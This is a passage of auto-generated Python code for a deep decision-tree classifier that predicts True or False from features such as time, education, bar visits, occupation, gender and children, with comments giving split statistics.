if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[1]<=0:
# {"feature": "Direction_same", "instances": 58, "metric_value": 0.4056, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[10]<=0.0:
# {"feature": "Time", "instances": 48, "metric_value": 0.4872, "depth": 12}
if obj[1]<=3:
# {"feature": "Direction_same", "instances": 39, "metric_value": 0.4962, "depth": 13}
if obj[11]>0:
return 'False'
elif obj[11]<=0:
return 'False'
else: return 'False'
elif obj[1]>3:
# {"feature": "Direction_same", "instances": 9, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'False'
elif obj[6]>3:
# {"feature": "Restaurant20to50", "instances": 18, "metric_value": 0.4444, "depth": 11}
if obj[10]>0.0:
# {"feature": "Direction_same", "instances": 12, "metric_value": 0.3704, "depth": 12}
if obj[11]<=0:
# {"feature": "Time", "instances": 9, "metric_value": 0.4333, "depth": 13}
if obj[1]<=1:
return 'True'
elif obj[1]>1:
return 'False'
else: return 'False'
elif obj[11]>0:
return 'False'
else: return 'False'
elif obj[10]<=0.0:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.3333, "depth": 12}
if obj[11]>0:
# {"feature": "Time", "instances": 4, "metric_value": 0.5, "depth": 13}
if obj[1]<=0:
return 'True'
elif obj[1]>0:
return 'False'
else: return 'False'
elif obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'False'
elif obj[5]>0:
# {"feature": "Time", "instances": 111, "metric_value": 0.4132, "depth": 10}
if obj[1]<=2:
# {"feature": "Education", "instances": 78, "metric_value": 0.3605, "depth": 11}
if obj[6]>1:
# {"feature": "Restaurant20to50", "instances": 50, "metric_value": 0.275, "depth": 12}
if obj[10]<=2.0:
# {"feature": "Direction_same", "instances": 35, "metric_value": 0.2, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[10]>2.0:
# {"feature": "Direction_same", "instances": 15, "metric_value": 0.3889, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[6]<=1:
# {"feature": "Restaurant20to50", "instances": 28, "metric_value": 0.4194, "depth": 12}
if obj[10]<=1.0:
# {"feature": "Direction_same", "instances": 17, "metric_value": 0.4563, "depth": 13}
if obj[11]<=0:
return 'False'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[10]>1.0:
# {"feature": "Direction_same", "instances": 11, "metric_value": 0.2922, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[1]>2:
# {"feature": "Restaurant20to50", "instances": 33, "metric_value": 0.465, "depth": 11}
if obj[10]<=1.0:
# {"feature": "Direction_same", "instances": 17, "metric_value": 0.4843, "depth": 12}
if obj[11]<=0:
# {"feature": "Education", "instances": 12, "metric_value": 0.4583, "depth": 13}
if obj[6]>2:
return 'True'
elif obj[6]<=2:
return 'False'
else: return 'False'
elif obj[11]>0:
# {"feature": "Education", "instances": 5, "metric_value": 0.3, "depth": 13}
if obj[6]<=2:
return 'True'
elif obj[6]>2:
return 'False'
else: return 'False'
else: return 'True'
elif obj[10]>1.0:
# {"feature": "Education", "instances": 16, "metric_value": 0.3875, "depth": 12}
if obj[6]<=4:
# {"feature": "Direction_same", "instances": 10, "metric_value": 0.3, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[6]>4:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.4, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[7]>19.215025871277074:
# {"feature": "Education", "instances": 63, "metric_value": 0.2574, "depth": 8}
if obj[6]<=2:
# {"feature": "Bar", "instances": 55, "metric_value": 0.2055, "depth": 9}
if obj[8]<=2.0:
# {"feature": "Time", "instances": 46, "metric_value": 0.1528, "depth": 10}
if obj[1]<=3:
# {"feature": "Direction_same", "instances": 33, "metric_value": 0.2048, "depth": 11}
if obj[11]>0:
# {"feature": "Restaurant20to50", "instances": 17, "metric_value": 0.1046, "depth": 12}
if obj[10]<=1.0:
# {"feature": "Children", "instances": 9, "metric_value": 0.1944, "depth": 13}
if obj[5]>0:
return 'True'
elif obj[5]<=0:
return 'True'
else: return 'True'
elif obj[10]>1.0:
return 'True'
else: return 'True'
elif obj[11]<=0:
# {"feature": "Restaurant20to50", "instances": 16, "metric_value": 0.2167, "depth": 12}
if obj[10]>0.0:
# {"feature": "Children", "instances": 15, "metric_value": 0.2222, "depth": 13}
if obj[5]>0:
return 'True'
elif obj[5]<=0:
return 'True'
else: return 'True'
elif obj[10]<=0.0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[1]>3:
return 'True'
else: return 'True'
elif obj[8]>2.0:
# {"feature": "Direction_same", "instances": 9, "metric_value": 0.4, "depth": 10}
if obj[11]>0:
# {"feature": "Time", "instances": 5, "metric_value": 0.2667, "depth": 11}
if obj[1]>0:
# {"feature": "Restaurant20to50", "instances": 3, "metric_value": 0.3333, "depth": 12}
if obj[10]>1.0:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[5]<=0:
return 'True'
else: return 'True'
elif obj[10]<=1.0:
return 'True'
else: return 'True'
elif obj[1]<=0:
return 'True'
else: return 'True'
elif obj[11]<=0:
# {"feature": "Time", "instances": 4, "metric_value": 0.3333, "depth": 11}
if obj[1]>0:
# {"feature": "Restaurant20to50", "instances": 3, "metric_value": 0.3333, "depth": 12}
if obj[10]>1.0:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[5]<=0:
return 'False'
else: return 'False'
elif obj[10]<=1.0:
return 'True'
else: return 'True'
elif obj[1]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
elif obj[6]>2:
# {"feature": "Time", "instances": 8, "metric_value": 0.3333, "depth": 9}
if obj[1]>0:
# {"feature": "Direction_same", "instances": 6, "metric_value": 0.3333, "depth": 10}
if obj[11]<=0:
# {"feature": "Children", "instances": 4, "metric_value": 0.5, "depth": 11}
if obj[5]<=0:
# {"feature": "Bar", "instances": 4, "metric_value": 0.5, "depth": 12}
if obj[8]<=1.0:
# {"feature": "Restaurant20to50", "instances": 4, "metric_value": 0.5, "depth": 13}
if obj[10]<=2.0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[11]>0:
return 'False'
else: return 'False'
elif obj[1]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[4]>4:
# {"feature": "Education", "instances": 284, "metric_value": 0.3594, "depth": 7}
if obj[6]<=0:
# {"feature": "Occupation", "instances": 165, "metric_value": 0.3, "depth": 8}
if obj[7]<=21:
# {"feature": "Time", "instances": 158, "metric_value": 0.2877, "depth": 9}
if obj[1]<=3:
# {"feature": "Direction_same", "instances": 132, "metric_value": 0.3122, "depth": 10}
if obj[11]>0:
# {"feature": "Restaurant20to50", "instances": 66, "metric_value": 0.2517, "depth": 11}
if obj[10]>0.0:
# {"feature": "Children", "instances": 59, "metric_value": 0.2805, "depth": 12}
if obj[5]<=0:
# {"feature": "Bar", "instances": 58, "metric_value": 0.2853, "depth": 13}
if obj[8]<=1.0:
return 'True'
elif obj[8]>1.0:
return 'True'
else: return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
elif obj[10]<=0.0:
return 'True'
else: return 'True'
elif obj[11]<=0:
# {"feature": "Restaurant20to50", "instances": 66, "metric_value": 0.3588, "depth": 11}
if obj[10]<=1.0:
# {"feature": "Bar", "instances": 49, "metric_value": 0.3222, "depth": 12}
if obj[8]<=0.0:
# {"feature": "Children", "instances": 30, "metric_value": 0.3578, "depth": 13}
if obj[5]<=0:
return 'True'
else: return 'True'
elif obj[8]>0.0:
# {"feature": "Children", "instances": 19, "metric_value": 0.2644, "depth": 13}
if obj[5]>0:
return 'True'
elif obj[5]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[10]>1.0:
# {"feature": "Children", "instances": 17, "metric_value": 0.4379, "depth": 12}
if obj[5]<=0:
# {"feature": "Bar", "instances": 9, "metric_value": 0.4444, "depth": 13}
if obj[8]>0.0:
return 'True'
elif obj[8]<=0.0:
return 'False'
else: return 'False'
elif obj[5]>0:
# {"feature": "Bar", "instances": 8, "metric_value": 0.3, "depth": 13}
if obj[8]>0.0:
return 'True'
elif obj[8]<=0.0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[1]>3:
# {"feature": "Bar", "instances": 26, "metric_value": 0.1348, "depth": 10}
if obj[8]<=1.0:
# {"feature": "Restaurant20to50", "instances": 21, "metric_value": 0.0893, "depth": 11}
if obj[10]<=1.0:
# {"feature": "Children", "instances": 16, "metric_value": 0.1172, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 16, "metric_value": 0.1172, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[10]>1.0:
return 'True'
else: return 'True'
elif obj[8]>1.0:
# {"feature": "Children", "instances": 5, "metric_value": 0.2, "depth": 11}
if obj[5]<=0:
return 'True'
elif obj[5]>0:
# {"feature": "Restaurant20to50", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[10]<=1.0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[7]>21:
# {"feature": "Direction_same", "instances": 7, "metric_value": 0.4048, "depth": 9}
if obj[11]<=0:
# {"feature": "Time", "instances": 4, "metric_value": 0.25, "depth": 10}
if obj[1]<=3:
return 'True'
elif obj[1]>3:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 11}
if obj[5]<=0:
# {"feature": "Bar", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[8]<=3.0:
# {"feature": "Restaurant20to50", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[10]<=2.0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[11]>0:
# {"feature": "Time", "instances": 3, "metric_value": 0.3333, "depth": 10}
if obj[1]>0:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 11}
if obj[5]<=0:
# {"feature": "Bar", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[8]<=3.0:
# {"feature": "Restaurant20to50", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[10]<=2.0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[1]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
elif obj[6]>0:
# {"feature": "Occupation", "instances": 119, "metric_value": 0.3986, "depth": 8}
if obj[7]<=13:
# {"feature": "Time", "instances": 112, "metric_value": 0.3981, "depth": 9}
if obj[1]<=2:
# {"feature": "Restaurant20to50", "instances": 76, "metric_value": 0.3388, "depth": 10}
if obj[10]>0.0:
# {"feature": "Direction_same", "instances": 69, "metric_value": 0.3186, "depth": 11}
if obj[11]<=0:
# {"feature": "Bar", "instances": 36, "metric_value": 0.3577, "depth": 12}
if obj[8]<=1.0:
# {"feature": "Children", "instances": 26, "metric_value": 0.4253, "depth": 13}
if obj[5]>0:
return 'True'
elif obj[5]<=0:
return 'True'
else: return 'True'
elif obj[8]>1.0:
# {"feature": "Children", "instances": 10, "metric_value": 0.1667, "depth": 13}
if obj[5]<=0:
return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[11]>0:
# {"feature": "Bar", "instances": 33, "metric_value": 0.2414, "depth": 12}
if obj[8]<=2.0:
# {"feature": "Children", "instances": 31, "metric_value": 0.2193, "depth": 13}
if obj[5]<=0:
return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
elif obj[8]>2.0:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[5]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
elif obj[10]<=0.0:
# {"feature": "Children", "instances": 7, "metric_value": 0.4857, "depth": 11}
if obj[5]>0:
# {"feature": "Bar", "instances": 5, "metric_value": 0.48, "depth": 12}
if obj[8]<=0.0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.48, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[5]<=0:
# {"feature": "Bar", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[8]<=0.0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[1]>2:
# {"feature": "Bar", "instances": 36, "metric_value": 0.4214, "depth": 10}
if obj[8]<=1.0:
# {"feature": "Children", "instances": 25, "metric_value": 0.384, "depth": 11}
if obj[5]>0:
# {"feature": "Restaurant20to50", "instances": 15, "metric_value": 0.28, "depth": 12}
if obj[10]<=1.0:
# {"feature": "Direction_same", "instances": 10, "metric_value": 0.4, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[10]>1.0:
return 'True'
else: return 'True'
elif obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 10, "metric_value": 0.4444, "depth": 12}
if obj[10]>0.0:
# {"feature": "Direction_same", "instances": 9, "metric_value": 0.4815, "depth": 13}
if obj[11]<=0:
return 'True'
elif obj[11]>0:
return 'True'
else: return 'True'
elif obj[10]<=0.0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[8]>1.0:
# {"feature": "Direction_same", "instances": 11, "metric_value": 0.4182, "depth": 11}
if obj[11]<=0:
# {"feature": "Children", "instances": 6, "metric_value": 0.5, "depth": 12}
if obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 4, "metric_value": 0.5, "depth": 13}
if obj[10]<=2.0:
return 'False'
else: return 'False'
elif obj[5]>0:
# {"feature": "Restaurant20to50", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[10]<=2.0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[11]>0:
# {"feature": "Children", "instances": 5, "metric_value": 0.2667, "depth": 12}
if obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[10]<=2.0:
return 'False'
else: return 'False'
elif obj[5]>0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
elif obj[7]>13:
# {"feature": "Time", "instances": 7, "metric_value": 0.1429, "depth": 9}
if obj[1]<=2:
return 'False'
elif obj[1]>2:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.0, "depth": 10}
if obj[11]>0:
return 'True'
elif obj[11]<=0:
return 'False'
else: return 'False'
else: return 'True'
else: return 'False'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[0]>2:
# {"feature": "Bar", "instances": 1390, "metric_value": 0.3797, "depth": 5}
if obj[8]<=3.0:
# {"feature": "Age", "instances": 1328, "metric_value": 0.3739, "depth": 6}
if obj[4]<=4:
# {"feature": "Occupation", "instances": 1062, "metric_value": 0.3836, "depth": 7}
if obj[7]>1:
# {"feature": "Education", "instances": 904, "metric_value": 0.3983, "depth": 8}
if obj[6]<=3:
# {"feature": "Time", "instances": 845, "metric_value": 0.4078, "depth": 9}
if obj[1]<=2:
# {"feature": "Restaurant20to50", "instances": 521, "metric_value": 0.3854, "depth": 10}
if obj[10]<=1.0:
# {"feature": "Children", "instances": 349, "metric_value": 0.4083, "depth": 11}
if obj[5]<=0:
# {"feature": "Gender", "instances": 212, "metric_value": 0.3971, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 115, "metric_value": 0.3856, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Direction_same", "instances": 97, "metric_value": 0.4107, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Gender", "instances": 137, "metric_value": 0.4238, "depth": 12}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 84, "metric_value": 0.4082, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 53, "metric_value": 0.4486, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[10]>1.0:
# {"feature": "Children", "instances": 172, "metric_value": 0.3367, "depth": 11}
if obj[5]<=0:
# {"feature": "Gender", "instances": 122, "metric_value": 0.3536, "depth": 12}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 67, "metric_value": 0.3475, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 55, "metric_value": 0.361, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Gender", "instances": 50, "metric_value": 0.294, "depth": 12}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 30, "metric_value": 0.32, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 20, "metric_value": 0.255, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[1]>2:
# {"feature": "Restaurant20to50", "instances": 324, "metric_value": 0.4372, "depth": 10}
if obj[10]<=1.0:
# {"feature": "Children", "instances": 211, "metric_value": 0.4177, "depth": 11}
if obj[5]<=0:
# {"feature": "Gender", "instances": 119, "metric_value": 0.3993, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 60, "metric_value": 0.375, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Direction_same", "instances": 59, "metric_value": 0.424, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Gender", "instances": 92, "metric_value": 0.4395, "depth": 12}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 58, "metric_value": 0.4405, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 34, "metric_value": 0.4377, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[10]>1.0:
# {"feature": "Children", "instances": 113, "metric_value": 0.4686, "depth": 11}
if obj[5]<=0:
# {"feature": "Gender", "instances": 66, "metric_value": 0.4537, "depth": 12}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 36, "metric_value": 0.4614, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 30, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Gender", "instances": 47, "metric_value": 0.4876, "depth": 12}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 34, "metric_value": 0.4931, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 13, "metric_value": 0.4734, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[6]>3:
# {"feature": "Restaurant20to50", "instances": 59, "metric_value": 0.2207, "depth": 9}
if obj[10]>0.0:
# {"feature": "Gender", "instances": 43, "metric_value": 0.2925, "depth": 10}
if obj[3]>0:
# {"feature": "Time", "instances": 30, "metric_value": 0.3492, "depth": 11}
if obj[1]>0:
# {"feature": "Children", "instances": 22, "metric_value": 0.3916, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 13, "metric_value": 0.355, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Direction_same", "instances": 9, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[1]<=0:
# {"feature": "Children", "instances": 8, "metric_value": 0.1875, "depth": 12}
if obj[5]<=0:
return 'True'
elif obj[5]>0:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.375, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Children", "instances": 13, "metric_value": 0.1282, "depth": 11}
if obj[5]>0:
return 'True'
elif obj[5]<=0:
# {"feature": "Time", "instances": 6, "metric_value": 0.2667, "depth": 12}
if obj[1]>0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.32, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[1]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[10]<=0.0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[7]<=1:
# {"feature": "Education", "instances": 158, "metric_value": 0.2746, "depth": 8}
if obj[6]<=4:
# {"feature": "Restaurant20to50", "instances": 157, "metric_value": 0.2667, "depth": 9}
if obj[10]<=1.0:
# {"feature": "Gender", "instances": 116, "metric_value": 0.3243, "depth": 10}
if obj[3]>0:
# {"feature": "Time", "instances": 65, "metric_value": 0.3663, "depth": 11}
if obj[1]<=3:
# {"feature": "Children", "instances": 47, "metric_value": 0.4001, "depth": 12}
if obj[5]>0:
# {"feature": "Direction_same", "instances": 32, "metric_value": 0.4043, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]<=0:
# {"feature": "Direction_same", "instances": 15, "metric_value": 0.3911, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[1]>3:
# {"feature": "Children", "instances": 18, "metric_value": 0.2771, "depth": 12}
if obj[5]>0:
# {"feature": "Direction_same", "instances": 11, "metric_value": 0.2975, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]<=0:
# {"feature": "Direction_same", "instances": 7, "metric_value": 0.2449, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Time", "instances": 51, "metric_value": 0.2598, "depth": 11}
if obj[1]<=2:
# {"feature": "Children", "instances": 27, "metric_value": 0.1966, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 26, "metric_value": 0.2041, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
elif obj[1]>2:
# {"feature": "Children", "instances": 24, "metric_value": 0.3299, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 24, "metric_value": 0.3299, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[10]>1.0:
# {"feature": "Children", "instances": 41, "metric_value": 0.0906, "depth": 10}
if obj[5]<=0:
# {"feature": "Time", "instances": 28, "metric_value": 0.1293, "depth": 11}
if obj[1]<=3:
# {"feature": "Gender", "instances": 21, "metric_value": 0.0905, "depth": 12}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 20, "metric_value": 0.095, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]<=0:
return 'True'
else: return 'True'
elif obj[1]>3:
# {"feature": "Gender", "instances": 7, "metric_value": 0.2449, "depth": 12}
if obj[3]<=1:
# {"feature": "Direction_same", "instances": 7, "metric_value": 0.2449, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[6]>4:
return 'False'
else: return 'False'
else: return 'True'
elif obj[4]>4:
# {"feature": "Education", "instances": 266, "metric_value": 0.3186, "depth": 7}
if obj[6]<=1:
# {"feature": "Occupation", "instances": 136, "metric_value": 0.2522, "depth": 8}
if obj[7]>5:
# {"feature": "Restaurant20to50", "instances": 103, "metric_value": 0.1977, "depth": 9}
if obj[10]<=2.0:
# {"feature": "Time", "instances": 98, "metric_value": 0.1819, "depth": 10}
if obj[1]>0:
# {"feature": "Children", "instances": 78, "metric_value": 0.203, "depth": 11}
if obj[5]<=0:
# {"feature": "Gender", "instances": 59, "metric_value": 0.1806, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 47, "metric_value": 0.1557, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Direction_same", "instances": 12, "metric_value": 0.2778, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Gender", "instances": 19, "metric_value": 0.2481, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 14, "metric_value": 0.3367, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[1]<=0:
# {"feature": "Gender", "instances": 20, "metric_value": 0.0933, "depth": 11}
if obj[3]<=0:
# {"feature": "Children", "instances": 15, "metric_value": 0.1212, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 11, "metric_value": 0.1653, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
elif obj[3]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[10]>2.0:
# {"feature": "Gender", "instances": 5, "metric_value": 0.2667, "depth": 10}
if obj[3]<=0:
# {"feature": "Time", "instances": 3, "metric_value": 0.3333, "depth": 11}
if obj[1]<=2:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[1]>2:
return 'False'
else: return 'False'
elif obj[3]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[7]<=5:
# {"feature": "Gender", "instances": 33, "metric_value": 0.3409, "depth": 9}
if obj[3]>0:
# {"feature": "Children", "instances": 24, "metric_value": 0.4125, "depth": 10}
if obj[5]>0:
# {"feature": "Time", "instances": 20, "metric_value": 0.375, "depth": 11}
if obj[1]<=2:
# {"feature": "Restaurant20to50", "instances": 16, "metric_value": 0.4375, "depth": 12}
if obj[10]>1.0:
# {"feature": "Direction_same", "instances": 8, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[10]<=1.0:
# {"feature": "Direction_same", "instances": 8, "metric_value": 0.375, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[1]>2:
return 'True'
else: return 'True'
elif obj[5]<=0:
# {"feature": "Time", "instances": 4, "metric_value": 0.3333, "depth": 11}
if obj[1]>0:
# {"feature": "Restaurant20to50", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[10]<=1.0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[1]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[3]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[6]>1:
# {"feature": "Time", "instances": 130, "metric_value": 0.373, "depth": 8}
if obj[1]<=2:
# {"feature": "Occupation", "instances": 73, "metric_value": 0.3936, "depth": 9}
if obj[7]<=19:
# {"feature": "Restaurant20to50", "instances": 71, "metric_value": 0.3941, "depth": 10}
if obj[10]>0.0:
# {"feature": "Children", "instances": 57, "metric_value": 0.3703, "depth": 11}
if obj[5]>0:
# {"feature": "Gender", "instances": 34, "metric_value": 0.3446, "depth": 12}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 24, "metric_value": 0.4132, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 10, "metric_value": 0.18, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[5]<=0:
# {"feature": "Gender", "instances": 23, "metric_value": 0.3568, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 14, "metric_value": 0.4592, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Direction_same", "instances": 9, "metric_value": 0.1975, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[10]<=0.0:
# {"feature": "Gender", "instances": 14, "metric_value": 0.449, "depth": 11}
if obj[3]>0:
# {"feature": "Children", "instances": 7, "metric_value": 0.3429, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.48, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Children", "instances": 7, "metric_value": 0.4762, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[5]>0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
elif obj[7]>19:
return 'False'
else: return 'False'
elif obj[1]>2:
# {"feature": "Occupation", "instances": 57, "metric_value": 0.3011, "depth": 9}
